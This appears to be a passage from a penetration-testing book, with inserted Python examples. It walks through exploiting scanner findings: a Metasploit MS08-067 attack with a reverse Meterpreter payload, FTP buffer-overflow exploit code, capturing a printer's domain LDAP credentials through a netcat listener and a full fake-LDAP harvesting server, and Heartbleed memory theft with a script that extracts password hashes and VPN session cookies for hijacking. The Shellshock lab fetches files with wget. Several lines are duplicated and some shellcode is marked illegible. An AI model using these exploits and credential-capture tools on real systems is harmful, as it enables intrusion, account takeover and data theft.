Parse XML to CSV for use with /discover/misc/worksheet.xlsx. 

Discover Parsing 


The output saves to a csv file under /home/data. The image below shows both a Nessus and Nmap 
output. This makes it much easier to quickly identify systems, services, and vulnerabilities. 
Burp takes a couple more steps. On the Scanner/Results tab, right-click on the URL you scanned and 
click "Report selected issues." You will be prompted with a reporting wizard; select XML and 
deselect "Base64-encode requests and responses" so the parser gets the raw request text. 


Burp Scanner results for http://172.16.151.144 (SQL injection, Cross-site scripting (reflected), 
Cleartext submission of password, Serialized object in HTTP message, Password field with 
autocomplete enabled, Cross-domain Referer leakage), and the reporting wizard with XML selected 
and "Base64-encode requests and responses" unchecked. 

Discover Burp Logs 


And the output is a well-formatted CSV file with all your findings! This can make it quick for 
reporting, and quickly identifies what you are going to attack next. 
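As an added example (not the Discover toolset's code, and not from the book), here is a small Python parser that flattens a Burp Scanner XML report into the same kind of CSV rows. It assumes the layout of Burp's "Report selected issues" XML export (an <issues> root with one <issue> per finding, each carrying name, host, path, location, severity, confidence and the triggering request, base64-encoded or not); the sample report embedded below is constructed, not a real scan.

```python
#!/usr/bin/env python3
"""Flatten a Burp Scanner XML report into CSV rows.

Added example, not the Discover toolset's own parser. Assumes the XML layout
Burp's "Report selected issues" wizard produces; SAMPLE_REPORT is constructed.
"""
import base64
import csv
import io
import xml.etree.ElementTree as ET

FIELDS = ["severity", "confidence", "name", "host", "ip", "path", "location", "request_line"]


def _text(issue, tag):
    node = issue.find(tag)
    return (node.text or "").strip() if node is not None else ""


def _request_line(issue):
    """First line of the request that triggered the finding (the GET with the
    injected parameter), decoding base64 if the wizard encoded it."""
    req = issue.find("requestresponse/request")
    if req is None or not req.text or not req.text.strip():
        return ""
    raw = req.text
    if req.get("base64") == "true":
        raw = base64.b64decode(raw).decode("utf-8", "replace")
    return raw.splitlines()[0].strip()


def parse_burp_issues(xml_text):
    """Return one dict per <issue>, highest severity first."""
    root = ET.fromstring(xml_text)   # Burp's own output, so stdlib XML is acceptable here
    rows = []
    for issue in root.iter("issue"):
        host = issue.find("host")
        rows.append({
            "severity": _text(issue, "severity"),
            "confidence": _text(issue, "confidence"),
            "name": _text(issue, "name"),
            "host": (host.text or "").strip() if host is not None else "",
            "ip": host.get("ip", "") if host is not None else "",
            "path": _text(issue, "path"),
            "location": _text(issue, "location"),
            "request_line": _request_line(issue),
        })
    order = {"High": 0, "Medium": 1, "Low": 2, "Information": 3}
    rows.sort(key=lambda r: order.get(r["severity"], 9))
    return rows


def count_by_severity(rows):
    counts = {}
    for r in rows:
        counts[r["severity"]] = counts.get(r["severity"], 0) + 1
    return counts


def to_csv(rows):
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


# Constructed sample: one base64-encoded request and one plain CDATA request.
_XSS_REQ = base64.b64encode(
    b"GET /owaspbricks/content-1/index.php?id=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1\r\n"
    b"Host: 172.16.151.144\r\n\r\n").decode()

SAMPLE_REPORT = """<issues burpVersion="1.6.09" exportTime="Wed Jun 03 10:00:00 PDT 2015">
  <issue>
    <serialNumber>2</serialNumber>
    <name>Password field with autocomplete enabled</name>
    <host ip="172.16.151.144">http://172.16.151.144</host>
    <path><![CDATA[/owaspbricks/login-1/index.php]]></path>
    <location><![CDATA[/owaspbricks/login-1/index.php]]></location>
    <severity>Low</severity>
    <confidence>Certain</confidence>
    <requestresponse>
      <request base64="false"><![CDATA[GET /owaspbricks/login-1/index.php HTTP/1.1
Host: 172.16.151.144

]]></request>
    </requestresponse>
  </issue>
  <issue>
    <serialNumber>1</serialNumber>
    <name>Cross-site scripting (reflected)</name>
    <host ip="172.16.151.144">http://172.16.151.144</host>
    <path><![CDATA[/owaspbricks/content-1/index.php]]></path>
    <location><![CDATA[/owaspbricks/content-1/index.php [id parameter]]]></location>
    <severity>High</severity>
    <confidence>Certain</confidence>
    <requestresponse>
      <request base64="true">""" + _XSS_REQ + """</request>
    </requestresponse>
  </issue>
</issues>
"""

if __name__ == "__main__":
    print(to_csv(parse_burp_issues(SAMPLE_REPORT)))
```

Run it on a real export with parse_burp_issues(open(path).read()); because it decodes base64 requests itself, it does not matter whether you unticked that box in the wizard.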
Summary 


Scanning the network is an important step for a successful network-wide penetration test. With such a 
large scope, both passive and active scanning can provide information about the network, services, 
applications, vulnerabilities, and hosts. Using specialized or customized port scans, web scraping, 
"smart brute forcing," and automated tools can help you increase the efficiency and the effectiveness 
of the test. These findings will directly lead into the next few sections on exploiting vulnerabilities 
identified by this process. 



The Drive - Exploiting Scanner Findings 


You were able to successfully complete your last mission of OSINT and scanning without being 
caught. The next phase of your mission is to take everything that you have gathered and learned to 
identify weaknesses and exploit them for fun and profit. 


As with the first THP book, The Drive section takes results from the prior phases and exploits them 
for an initial foothold into the company. Some findings might have exploits available through the 
Metasploit framework, some you might have to find on exploit forums, and some just take experience 
and knowledge to take advantage of misconfigurations. 


Whether you use Nexpose or Nessus (or any other vulnerability scanner) might not make a difference 
to the exploitation process. Once a scanner finds a vulnerability, I will usually go and search for a 
working exploit. I have dedicated a section in the later chapters to vulnerability searching and 
how to find exploits based on findings from a scanner, but for now I will briefly describe how to use 
Metasploit, the importance of understanding the scripts you use to exploit vulnerabilities, and common 
misconfigurations. 


Metasploit 

(http://www.metasploit.com) (Windows/Kali Linux) 


Before we can get into exploiting scanner findings, we need to quickly go over Metasploit again. The 
Metasploit Framework is designed for developing exploits, running them, and assisting in attacks. The best part 
of the framework is that it was developed with research in mind. By this, I mean that it is very easy to 
develop your own Metasploit modules and use them within the framework. It doesn't take a lot of 
Ruby knowledge; basic scripting skills are enough. Without spending too much time 
explaining Metasploit, let's walk through an example using the framework. Remember that this book 
is geared to those who have some Metasploit experience. If you are pretty new to Metasploit, you 
should spend a fair chunk of time learning the basics of this tool. 


Here are a few helpful tips before we start with Metasploit. You should refer back to these tips while 
you are using Metasploit during your first few times; after that you should be good on your own. 


From A Terminal In Kali - Initialize And Start Metasploit: 


• Start PostgreSQL 

o service postgresql start 

• Start PostgreSQL on bootup 

o update-rc.d postgresql enable 

• Start and stop the Metasploit service (this will set up your database.yml file for you) 

o service metasploit start 
o msfconsole 
o exit 
o service metasploit stop 

• Log everything to /root/msfconsole.log at a command prompt: 

o echo "spool /root/msfconsole.log" > /root/.msf4/msfconsole.rc 

• Start the Metasploit command line 

o msfconsole 


Running Metasploit - Common Configuration Commands: 


• help: Use help as much as you can! 

• search [string]: Search for vulnerability by CVE, title, application, etc. 

• use [module]: select module 

• info: get information once a module is selected 

• show options: show the requirements for the module 

• set and setg: Set the variables from show options. You can use setg for Global 
Variables. If you are jumping between modules and exploits and you don’t want to 
type in the IP address (or other input) every time, use setg instead of set 

• If you are using a remote exploit, you might not see the PAYLOAD as a choice 
inside show options, but you can always set it with: set PAYLOAD [hit tab a couple of 
times to see the choices] 

• To set custom payloads: set EXE::Custom [file] 

• exploit -j: run the exploit as a background job; any connections to the listening 
handler are kept as sessions in the background 


Running Metasploit - Post Exploitation And Other 


• sessions -K: Kill all sessions 

• background: From a Meterpreter shell, go back into the main menu, but keep your 
current session established in the background 

• Resource file scripts to automate your handler (more info in the Tips and Tricks 
section of the book): msfconsole -r resource.rc 

• http://www.cheatography.com/huntereight/cheat-sheets/metasploit-4-5-0-dev-15713/ 

• http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands 

The best method is to learn through example. I know that the MS08-067 vulnerability is pretty old, but 
I still find these vulnerabilities every so often and the attack is extremely stable compared to other 
remote attacks. For those who have never used or exploited the MS08-067 vulnerability, I 
recommend setting up a lab with an old unpatched Windows XP system and trying this exact example. 





If you are an expert MS08-067'er, you can skip this short section. 


Using Metasploit For MS08-067: 


• Dropping into Metasploit on Kali: 

o Open up a terminal and type: msfconsole 

• To search for a vulnerability, type: 

o search ms08-067 

• Select the exploit from the search results, type: 

o use exploit/windows/smb/ms08_067_netapi 

• See options required for the exploit to work, type: 

o show options 

• Set IP information, type: 

o set RHOST [IP of vulnerable Windows host] 
o set LHOST [IP of your machine] 

• Select which payload (to get a better understanding of the types of payloads, 
review: http://www.offensive-security.com/metasploit-unleashed/Payload_Types) 
and encoder to use, type: 

o set PAYLOAD windows/meterpreter/reverse_tcp 
o set ENCODER x86/shikata_ga_nai 

• Run the attack, type: 

o exploit 


msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi): 

   Name     Current Setting  Required  Description 
   ----     ---------------  --------  ----------- 
   RHOST    192.168.1.10     yes       The target address 
   RPORT    445              yes       Set the SMB service port 
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 

Payload options (windows/meterpreter/reverse_tcp): 

   Name      Current Setting  Required  Description 
   ----      ---------------  --------  ----------- 
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none 
   LHOST     192.168.1.2      yes       The listen address 
   LPORT     4444             yes       The listen port 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic Targeting 

Metasploit 


These are the basics of Metasploit and we will build off these really quickly. Make sure you spend 
time exploiting Windows and Linux machines before trying any attacks in the wild. 


Scripts 


There were countless times where I found exploits for vulnerabilities that were not in Metasploit. 
Usually, when searching for vulnerabilities based on version numbers from the banner-grabbing 
script, I will find exploits in other places (see the Special Teams - Cracking, Exploits, and Tricks 
section). A lot of the time, the scripts/code will be written in Python, C++, Ruby, Perl, Bash, or 
some other language. 


Note that as a penetration tester, you need to be familiar with how to edit, modify, execute, and 
understand scripts and code regardless of the language, and be able to understand why an exploit 
works. I don't recommend you ever execute a script without testing it first. I have honestly seen a few 
scripts on forums and Exploit-DB where the shellcode payload actually causes harm to the intended 
system: after the script exploits the vulnerability, the payload deletes everything on the vulnerable 
host. I am pretty sure that your client would not be too happy if everything on their host was 
wiped clean. This is why you should always either use your own shellcode or validate the shellcode 
that is within the script (disassemble it, or at least compare it against a payload you generated 
yourself with msfvenom). 


WarFTP Example 


Let's say you find a vulnerable version of WarFTP server running and you find some code (for 
example: http://downloads.securityfocus.com/vulnerabilities/exploits/22944.py) on the Internet. 
Things you may need to understand: 

• How do you run the exploit? What language is it? Do you need to compile it or are 
there any libraries you need to import? 

• Are there any dependencies required for the exploit to work? Version of Windows 
or Linux? DEP or ASLR? 

• Are the EIP addresses or any other registers or padding values hardcoded to 
specific versions? Do they need to be modified? 

• Will the exploit take down the service? Do you only have one chance at 
compromising the host? This is very important as you might need to work with the 
client or test a similar infrastructure environment. 


Here is an example of what your script could look like and, if run properly, could allow shell access 
on the victim server. 



#!/usr/bin/python 
import os 
import sys 
import struct 

sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) 
eip = 0x...                                   # return address (value not legible in the scan) 

shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49..."   # encoded payload 
shellcode += "..."                            # (remaining shellcode bytes not legible in the scan) 

prepend  = "\x81\xC4\xFF\xEF\xFF\xFF"         # add esp, -1001h (keeps the stack clear of the decoding shellcode) 
prepend += "..."                              # inc esp (byte not legible in the scan) 

buf  = "USER " 
buf += "A" * ... + struct.pack('<I', eip) + "\x90" * ... + prepend + shellcode   # padding and NOP counts not legible in the scan 
buf += "\r\n" 

sys.stdout.write(buf) 

Example Exploit 






Even with MS08-067, the exploit is operating system and service pack dependent. Luckily, that 
Metasploit module tries to identify the proper OS before exploiting the host (the "Automatic Targeting" 
target shown above). A lot of the exploits written in scripting languages do not take this into 
account and are developed for a single OS type. This is why you will often see that the exploit contains 
information about the system on which it was tested. Even within the same operating system, something 
like the language of the OS can cause an exploit to fail or cause a denial of service, because the 
addresses the exploit hard-codes differ between language builds. For example, the following PCMAN FTP 
buffer overflow exploit was only tested on the French version of Windows 7 SP1. This does not guarantee 
that this exploit will be successful on the English version. 

Exploit-DB entry (www.exploit-db.com/exploits/27277/): 
PCMAN FTP 2.07 PASS Command - Buffer Overflow 
EDB-ID: 27277   CVE: N/A   OSVDB-ID: 94624   Author: Ottomatik   Published: 2013-08-02 

#!/usr/bin/python2.7 
# -*- coding: utf-8 -*- 
""" 
PCMAN FTPD 2.07 PASS Command Buffer Overflow 
Author: Ottomatik 
Date: 2013-07-31 
Software: PCMAN FTPD 
Version: 2.07 
Tested On: Windows 7 SP1 - French; 
Description: 
  * The PASS Command is vulnerable to a buffer overflow; 
  * Other commands may be vulnerable; 
""" 

FTP Exploit Example Script 


This is why I recommend you understand and test all of your exploits before you try them on any 
production host and make modifications to scripts as necessary. 


Printers 


It often happens that we overlook low-level findings, but there are many times where we can go from 
a low-severity finding to owning the network. One of my favorite examples is printers. We all come 
across a ton of multi-function printers (MFPs) on our engagements and, in the past, have overlooked 
them. What if these MFP devices could lead to a compromise of the network? 

You jump on a network and currently don't have any credentials. You might want to start small and 
scan only your current subnet, in the hope of not alerting any IDS sensors. In doing so, you come across a 
multi-function printer. 


Maybe your scanner picks up default credentials, or you guess the password from reading the 
documentation. {5} Or perhaps you come across an unpatched printer and use an exploit from your 
printer exploitation folder; check out /opt/praedasploit 
(https://github.com/MooseDojo/praedasploit). Once in the administrative console, you poke 
around and nothing of value seems to be there, or is there? You notice that these enterprise multi-function 
printers have the capability to query the domain via LDAP to find email addresses. This is what lets a 
user standing at the printer's little LCD screen look up the recipient's address by name when scanning a 
document to email. What if you could pull the password of the account the printer uses to bind to the 
LDAP server to run those queries? {6} 

We first log into our Xerox MFP with the default credentials over HTTP. Like I said before, I am 
sure we see this pretty much on every penetration test. 
Status page of the Xerox MFP after logging in (Name: xerox, Location: Copy, Machine Model: Xerox 
ColorQube, alert: Paper Tray Empty). 

Default Multifunction Printer 


A quick Google search (or maybe your scanner identifies the default password) and you know that the 
admin password is 1111. Going to the “Properties” tab, we can see that this printer is configured with 
LDAP to query the domain. 



CentreWare Internet Services, Properties tab: the Configuration Overview lists the protocols with 
their status (Enabled) and an Edit action, and the Services/Security sections include the LDAP 
settings. 

Multifunction Printer - LDAP setting 


Looking at the configuration, we need to modify the LDAP server so that it points to our Kali attack 
VM. This way, any LDAP lookups will be directed to our LDAP server instead of the corporate 
LDAP server. 


We see in the username, that it currently uses a domain account and although the password field is 
blank, we can still make changes without re-entering the password information. We go ahead and 
save our configuration changes. 
Multifunction Printer - LDAP Modification 


Now, we just need to wait until the MFP creates an LDAP lookup and we should be able to capture 
the credentials. Luckily, in the case of Xerox (and many other printers), they have a feature to test 
your LDAP queries. 


We can click the "User Mappings” tab and test a user lookup. 
MFP - LDAP Check 


Remember that we are now pointing the LDAP server setting at our Kali Linux box. Before testing an 
account, we need to set up a netcat listener on the port we entered in the configuration page 
above. We start a quick listener on port 444 (or whatever port you configured), go back into the 
management console, and hit the "search user" button. 

root@kali:~# nc -l -vv -p 444 
listening on [any] 444 ... 
inverse host lookup failed: Unknown server error : Connection timed out 
connect to [...] from ... 
...testlab\Domain_Admin_Account...$uper$ecretPass!... 
 rcvd 84 

MFP - Capturing LDAP Credentials 


Looking at our netcat output, we now see that the MFP, which is connected to our Kali netcat listener 
via LDAP, tried to authenticate using a Domain Admin Account and a password of 
“$uper$ecretPass!”. 

In most cases, you might not come across a domain admin account, but you will have your first 
account to move laterally through the network. 
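As an added example (not the book's own procedure, which uses netcat), here is a small Python listener that stands in for the LDAP server the MFP is pointed at and decodes the LDAPv3 simple bind it sends. A simple bind carries the DN and password in cleartext inside BER-encoded fields, which is why they show up in the netcat dump; parsing the BindRequest gives clean fields and lets us answer with a success BindResponse so the printer's "search user" test does not error out. The port, the account names and the sample message below are assumptions made for the example.

```python
#!/usr/bin/env python3
"""Fake LDAP server that decodes the printer's simple-bind credentials.

Added example, not from the book. Names, port and SAMPLE_BIND are constructed.
"""
import socket
import sys


def _ber_len(n):
    """BER length: short form under 128, else 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, payload):
    return bytes([tag]) + _ber_len(len(payload)) + payload


def _int(n):
    """BER INTEGER; keeps a leading zero byte when the top bit would be set."""
    return _tlv(0x02, n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big"))


def _read_tlv(buf, pos):
    """Return (tag, value_start, value_end) for the TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    return tag, pos, pos + length


def parse_simple_bind(msg):
    """Decode LDAPMessage{messageID, BindRequest{version, name, simple}}.
    Returns (message_id, version, dn, password), or None for anything that is
    not a simple bind (a SASL bind carries no cleartext password)."""
    if len(msg) < 7:
        return None
    tag, s, e = _read_tlv(msg, 0)
    if tag != 0x30:                      # LDAPMessage SEQUENCE
        return None
    tag, s, e = _read_tlv(msg, s)
    if tag != 0x02:                      # messageID INTEGER
        return None
    message_id = int.from_bytes(msg[s:e], "big")
    tag, s, e = _read_tlv(msg, e)
    if tag != 0x60:                      # [APPLICATION 0] BindRequest
        return None
    tag, s, e = _read_tlv(msg, s)        # version INTEGER
    version = int.from_bytes(msg[s:e], "big")
    tag, s, e = _read_tlv(msg, e)        # name LDAPDN (OCTET STRING)
    dn = msg[s:e].decode("utf-8", "replace")
    tag, s, e = _read_tlv(msg, e)        # authentication CHOICE
    if tag != 0x80:                      # [0] simple: cleartext password
        return None
    return message_id, version, dn, msg[s:e].decode("utf-8", "replace")


def build_simple_bind(message_id, dn, password, version=3):
    """Encoder used to fabricate test messages."""
    bind = _int(version) + _tlv(0x04, dn.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _int(message_id) + _tlv(0x60, bind))


def bind_success(message_id):
    """BindResponse [APPLICATION 1] with resultCode success(0), empty
    matchedDN and diagnosticMessage."""
    result = _tlv(0x0A, b"\x00") + _tlv(0x04, b"") + _tlv(0x04, b"")
    return _tlv(0x30, _int(message_id) + _tlv(0x61, result))


# Constructed sample: a bind as user@corp / secret1, hand-encoded.
SAMPLE_BIND = (b"\x30\x1c\x02\x01\x01\x60\x17\x02\x01\x03"
               b"\x04\x09user@corp\x80\x07secret1")


def serve(port=389, bind_addr="0.0.0.0"):
    """Point the MFP's LDAP server setting here, then hit "search user"."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(5)
        while True:
            conn, peer = srv.accept()
            with conn:
                try:
                    creds = parse_simple_bind(conn.recv(4096))
                except IndexError:       # truncated or garbage input
                    creds = None
                if creds:
                    mid, ver, dn, pw = creds
                    print("[+] %s LDAPv%d bind  dn=%r  password=%r" % (peer[0], ver, dn, pw))
                    conn.sendall(bind_success(mid))
                else:
                    print("[-] %s sent something other than a simple bind" % peer[0])


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 389)
```

Run it as root on the Kali box with the port you entered in the printer's LDAP settings (389 by default), then hit "search user". If the printer is configured for LDAPS (636) or STARTTLS, the accepted socket has to be wrapped in TLS first; the parsing is the same once the stream is decrypted.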


Heartbleed 


Heartbleed is one of those buzzword security vulnerabilities that blew up in 2014. Unfortunately for 
network administrators and system owners, this vulnerability was one of the worst issues of that year. 
The Heartbleed bug was a vulnerability in OpenSSL that allowed an attacker to read parts of the 
server's memory. So what does this really mean? You can ask a server that uses SSL/TLS to echo 
back a heartbeat payload and, by lying about the payload's length, get a chunk of the server's memory 
back along with it. For an easier visual reference, visit this xkcd comic: http://xkcd.com/1354/. In the 
comic, you ask for a word to be returned (for example, "dog"), but ask for the size to be returned as 500 
bytes instead of the real 3 bytes. The server returns the word "dog", and in the process you also 
receive whatever other memory happened to follow it, left over from previous requests. 


We don't know exactly how many systems were vulnerable, but zmap.io did a scan of the Alexa Top 
1 Million domains as of April 16, 2014 and reported which domains were vulnerable at the time. 
Reports have stated that even today some of those domains are still vulnerable. See 

https://zmap.io/heartbleed/vulnerable.html 






The scary part was what was found in the memory space. From numerous penetration tests, we found 
passwords, usernames, random strings, emails, session keys, and even the server's private SSL key. With 
the private key, we can decrypt any sniffed traffic that was negotiated with RSA key exchange (sessions 
using ephemeral Diffie-Hellman suites cannot be decrypted after the fact, but the key still lets us 
impersonate the server). 


So let’s walk through one example. Although there are numerous tools (a Metasploit module is 
available) to pull memory from vulnerable OpenSSL services, we are going to compile our own: 


• cd /opt/ 

• wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c 

• gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto 

• chmod +x heartbleed 


We should have a heartbleed binary to execute against a vulnerable service. The most common way 
to exploit heartbleed was via HTTPS, but it is not the only way. One more interesting example that I 
have seen in multiple environments is from OpenLDAP using OpenSSL. We all know that LDAP is 
the authentication and authorization source for many different companies and being able to pull out 
sensitive data could be detrimental. 


From our vulnerability scanner output, we see that 192.168.100.101 is vulnerable to Heartbleed. 
Let’s take the binary we just compiled and execute it against that host: 

• ./heartbleed -s [IP] -p [port] -f [output file] -v [verbose] -t [type] 

• example below: ./heartbleed -s 192.168.100.101 -p 636 -f outputldap -v -t 1 


root@kali:/opt# ./heartbleed -s 192.168.100.101 -p 636 -f output_ldap -v -t 1 
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit 
[ connecting to 192.168.100.101 636/tcp 
[ connected to 192.168.100.101 636/tcp 
[ <3 <3 <3 heart bleed <3 <3 <3 
[ heartbeat returned type=24 length=16416 
[ decrypting SSL packet 
[ heartbleed leaked length=65535 
02 FF FF AF 8F DC BE 13 15 80 4D E8 8A D3 27 2C 
78 88 CF C2 3B 40 7C 08 08 08 08 08 08 08 08 08 
... 
[ final record type=24, length=16384 
[ wrote 16384 bytes of heap to file 'output_ldap' 
[ heartbeat returned type=24 length=16416 


Heartbleed check 


What might we see in the output_ldap file? If you look closely, we see a salted SHA-1 password hash 
in OpenLDAP's {SSHA} format. We could take that into oclHashcat and crack it. In the same dump, we 
could also have seen user accounts, organizational structure, and the server's private SSL key. With a 
copy of that private key, we could decrypt sniffed traffic to that LDAP server (for sessions negotiated 
with RSA key exchange; forward-secret DHE/ECDHE sessions are not recoverable this way). This could 
mean that we would have the credentials of every user who authenticated against this LDAP server. 

Heartbleed - LDAP Memory Disclosure 


Now, we know there are tons of different Web and LDAP servers that were vulnerable, but these 
aren’t the only juicy sources of Heartbleed data. One of the largest issues and attacks seen with 
Heartbleed was that it affected SSL VPNs. Imagine for a second that you could read the server’s 
memory on a VPN server. What would be the impact if you could see username and passwords? In 
theory, you would have direct access as any user that was logged in at that time. What if the 
vulnerability was after-hours? Whose account might you compromise? In the case of Heartbleed, as 
many IT administrators VPN’ed in during the rush to patch systems, they could have been getting 
compromised at the same time. 


Let’s take a look at the Juniper SSL VPNs that were vulnerable to this bug. Running the same 
command as before, we query the SSL VPN web server to return what is stored in the designated 
memory space. A result would look like the following: 
Heartbleed - SSL VPN 

In this case, the client even had two-factor authentication, but remember how two-factor works with 
SSL VPNs. Once you authenticate with both username/password and token (second factor), you get 
back a web session ID. If you capture just the web session ID, you can impersonate this user 
(without the second factor) by taking their session ID and importing it into your own browser. For 
example, we see in the Heartbleed memory dump a cookie called DSID. What is the DSID? 


“The SA issues an HTTP cookie to authenticate a user session (DSID), which is shared by client 
components (that is, NC/WSAM/Pulse) and the browser. Generally, browsers do not store cookies in 
any secure manner; so it is relatively easy for an attacker to obtain the DSID cookie and gain access 
to an SA session.”{7} 


This is the user’s session cookie! If we grab this cookie and create this cookie in our browser, we 
become this user. So let’s open up Firefox, access the VPN server, select Cookies from the Web 
Developer tab, and view Cookie Information. 


Firefox at https://suck.testlab/dana-na/auth/url_default/welcome.cgi (the SA sign-in page with its 
Username, Password and Realm fields), with the Web Developer toolbar's Cookies menu open: Disable 
Cookies, Add Cookie..., Delete Domain Cookies, Delete Path Cookies, Delete Session Cookies. 

Heartbleed - Adding a Cookie 


You might already see two different cookies or the DSID cookie might even be missing. Just add it in 
with the DSID value you obtained from the Heartbleed bug and reload that page. 





Cookie list after the edit (2 cookies): 

Name      Value                              Host          Path       Expires                        Secure  HttpOnly 
DSSIGNIN  url_default                        suck.testlab  /dana-na/  Thu, 31 Dec 2037 00:00:00 GMT  Yes     No 
DSID      [value captured via Heartbleed]    suck.testlab  /          At end of session              Yes     No 

Heartbleed - Adding the DSID Cookie 


From recent assessments, I don’t really see Heartbleed publicly accessible as when it first came out, 
but I still find it often on internal engagements. 
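The LDAP dump above and the VPN case here both come down to the same step: scanning the leaked heap for things you can use. As an added example (not part of the book or of heartbleed.c), here is a Python script that searches a dump file for OpenLDAP {SSHA} password hashes and Juniper-style DSID/DSSIGNIN cookies and checks the hashes against a wordlist. It assumes the dump is the raw bytes the tool wrote with -f, that the directory stores {SSHA} hashes (base64 of SHA-1(password + salt) followed by the salt), and that the VPN cookie is named DSID; the sample dump embedded below is constructed.

```python
#!/usr/bin/env python3
"""Triage a Heartbleed memory dump: pull out {SSHA} hashes and VPN session
cookies, and check the hashes against a wordlist.

Added example, not from the book or heartbleed.c. SAMPLE_DUMP is constructed.
"""
import base64
import hashlib
import os
import re

# 20-byte digest + salt, base64: 27+ chars, optional padding.
SSHA_RE = re.compile(rb"\{SSHA\}[A-Za-z0-9+/]{27,}={0,2}")
# Juniper SA session cookies as they appear inside a leaked Cookie header.
COOKIE_RE = re.compile(rb"(DSID|DSSIGNIN)=([A-Za-z0-9_.-]{6,})")


def extract_secrets(dump):
    """Return the {SSHA} hashes and VPN cookies found anywhere in the bytes;
    they sit in the middle of binary junk, so search the raw bytes, not text."""
    hashes = sorted({m.decode() for m in SSHA_RE.findall(dump)})
    cookies = sorted({(k.decode(), v.decode()) for k, v in COOKIE_RE.findall(dump)})
    return {"ssha": hashes, "cookies": cookies}


def check_ssha(ssha, candidate):
    """OpenLDAP {SSHA} = base64( SHA1(password || salt) || salt )."""
    blob = base64.b64decode(ssha[len("{SSHA}"):])
    digest, salt = blob[:20], blob[20:]
    return hashlib.sha1(candidate.encode() + salt).digest() == digest


def crack_ssha(ssha, wordlist):
    """Tiny stand-in for oclHashcat; returns the matching word or None."""
    for word in wordlist:
        if check_ssha(ssha, word):
            return word
    return None


def make_ssha(password, salt=None):
    """Build a hash the way the directory would (used for the sample dump)."""
    salt = os.urandom(4) if salt is None else salt
    digest = hashlib.sha1(password.encode() + salt).digest()
    return b"{SSHA}" + base64.b64encode(digest + salt)


# Constructed sample dump: heap junk around a userPassword attribute and a
# leaked Cookie header, laid out as the tool's -f output would be.
SAMPLE_DUMP = (
    b"\x02\xff\xff\xaf\x8f\xdc\xbe\x13\x15\x80"
    b"dn: uid=jsmith,ou=people,dc=testlab,dc=local\x00"
    b"userPassword: " + make_ssha("Winter2015!", b"\x9a\x1c\x33\x07") + b"\x00\x00"
    b"Cookie: DSSIGNIN=url_default; DSID=deadbeef0123456789abcdef\r\n"
    b"\x08\x08\x08\x08"
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    found = extract_secrets(data)
    for h in found["ssha"]:
        print("[+] hash:", h)
    for name, value in found["cookies"]:
        print("[+] cookie: %s=%s" % (name, value))
```

For real cracking, hand the extracted hash to hashcat mode 111 (nsldaps, SSHA-1 base64); the crack_ssha() loop is only there to show exactly what the hash format is and why the salt has to be carried along with the digest.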


Shellshock 


Shellshock was the second huge vulnerability in 2014 that caused a multitude of systems to get 
infected all over the Internet. {8} Shellshock was a vulnerability that allowed remote code execution 
because of how Bash imports environment variables whose value begins with the string "() {": 
vulnerable versions parse the value as a function definition and then keep going, executing whatever 
follows the closing brace. Although this didn't solely affect CGI, a web server hands request headers to 
CGI scripts as environment variables, so any CGI script that runs under Bash is easily attackable. The 
first part of the exploit string, which is really just an empty function definition followed by a 
semicolon, is written as "() { :;};". Regardless of what the function body contains, all we care about 
is the value we inject after the trailing semicolon, which will be parsed and executed by vulnerable 
versions of Bash. 


Shellshock Lab 


This sounds complex, but the best way to demonstrate shellshock is through an example. This will 
give you a good understanding of how it works. The OWASPBWA vulnerable web application 
virtual machine is vulnerable to the Bash exploit, so make sure you have it running. Log into that VM 
image and copy the vulnerable cgi file listed below first. 


On the OWASPBWA VM Image from a Terminal: 









• wget --no-check-certificate https://raw.githubusercontent.com/cheetz/icmpshock/master/test.cgi -O /usr/lib/cgi-bin/test.cgi 

• chmod +x /usr/lib/cgi-bin/test.cgi 

• Find the IP of the vulnerable host (ifconfig) 

• Find the IP of the vulnerable host (ifconfig) 


This writes a shell script into the cgi-bin folder, which we will use to trigger the vulnerability. 
Remember, for something like Shellshock to work, there needs to be a CGI script in the cgi-bin folder 
that is executed by Bash (or that calls out to it). You can access it by going to a browser and 
entering http://[IP of vulnerable host]/cgi-bin/test.cgi. If everything worked, you should see a page 
that just says "hi". 


Going back to our attacking Kali host, we are going to use a tool I created called icmpshock.py (note 
that there is also a Metasploit module, so try them all). The reason I created this script is that I 
wanted a tool to brute-force through all common CGI file names at speed and test all the 
common HTTP headers (User-Agent, Cookie, Host, Referer) with Shellshock. As long as 
you have a pretty big pipe, you can take advantage of Python's threading to brute-force through all CGI 
files/directories in just seconds. Remember that we are going for quick and efficient, to try to pop as 
many boxes as possible. 

Now, we go back to our attacking VM host, which you have already configured at the beginning of the 
book, and go to: 

• cd /opt/icmpshock/ 

• chmod +x icmpshock.py 

• gedit target_list.txt and add the vulnerable server's IP 

• Start up tcpdump to listen for ICMP echo requests in a new terminal window: 

o tcpdump -nni eth0 -e 'icmp[icmptype] == 8' 

• ./icmpshock.py [Listener IP of the Kali Host] target_list.txt 


